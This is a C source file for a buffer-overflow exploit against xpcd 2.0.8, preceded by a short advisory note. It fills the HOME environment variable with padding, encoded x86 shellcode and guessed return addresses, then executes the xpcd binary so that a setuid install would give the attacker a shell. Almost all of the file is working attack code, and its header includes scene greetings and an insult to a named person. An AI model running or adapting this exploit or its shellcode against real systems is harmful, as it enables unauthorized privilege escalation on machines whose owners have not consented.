// source: https://www.securityfocus.com/bid/8370/info

A problem in the handling of long strings in environment variables by xpcd may result in a buffer overflow condition. This may allow an attacker to gain unauthorized access to system resources.

/****************************************************************************
 * xpcd 2.0.8 [latest] exploit written by r-code [Elite FXP Team] *
 * *
 * Actually xpcd usually isn`t suid, therefore for most of you *
 * this exploit will be useless, on the other hand, maybe on some *
 * conditions someone sets +S (who knows... ;-) *
 * *
 * Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher *
 * Flames to: ElSiLaSoF - fucking kiddie.. *

****************************************************************************/


#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>


unsigned long int get_sp(void) {
  __asm__("movl %esp,%eax");
}


char shellcode[] =


"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x60\x80\x36"
"\x01\x46\xe2\xfa\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\x83\x10"
"\x01\x01\xc6\x44\xfd\x01\x01\x01\x01\x8c\xba\x63\xef\xfe\xfe\x88\x7c\xf9\xb9"
"\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
"\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x5a\x5f\x5e\xc8\xc2\x8c\x77\x01"
"\x91\x91\x91\x91";



#define LEN 280
#define DEFAULT_OFFSET 530
#define PATH "/usr/local/bin/xpcd"


int main(int argc,char **argv) {
  register int i;
  char *evilstr=0,*str=0,*e=0;
  unsigned long int retaddr=0,offset=DEFAULT_OFFSET,*ptr=0;

  printf("[=] xpcd0x01 exploit written by r-code d_fence(at)gmx(dot)net
[ELITE FXP TEAM]\n");
  printf("[=] Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik,
Cypher\n");
  printf("[=] Flames to: ElSiLaSoF - fucking kiddie.\n\n");


  if(argc>1)
    offset=atoi(argv[1]);

  retaddr=get_sp() - offset;

  printf("iNFO:) esp: 0x%x offset: 0x%x ret_addr:
0x%x\n",get_sp(),offset,retaddr);
  printf("iNFO:) If Doesn`t work, try with OFFSETS 400 - 600\n\n");

  evilstr=(char *)malloc(LEN);
  e=(char *)malloc(LEN+10);
  ptr=(unsigned long int *)evilstr;

  for(i=0;i<(LEN);) {
    evilstr[i++] = (retaddr & 0x000000ff);
    evilstr[i++] = (retaddr & 0x0000ff00) >> 8;
    evilstr[i++] = (retaddr & 0x00ff0000) >> 16;
    evilstr[i++] = (retaddr & 0xff000000) >> 24;
  }

  memset(evilstr,'A',(LEN/2));

  for(i=0;i<strlen(shellcode);i++)
    evilstr[(LEN/2)-(strlen(shellcode)/2)+i]=shellcode[i];

  evilstr[LEN]=0x00;
  memcpy(e,"HOME=",5);
  memcpy(e+5,evilstr,LEN);
  putenv(e);
  execl(PATH,"xpcd",NULL);

}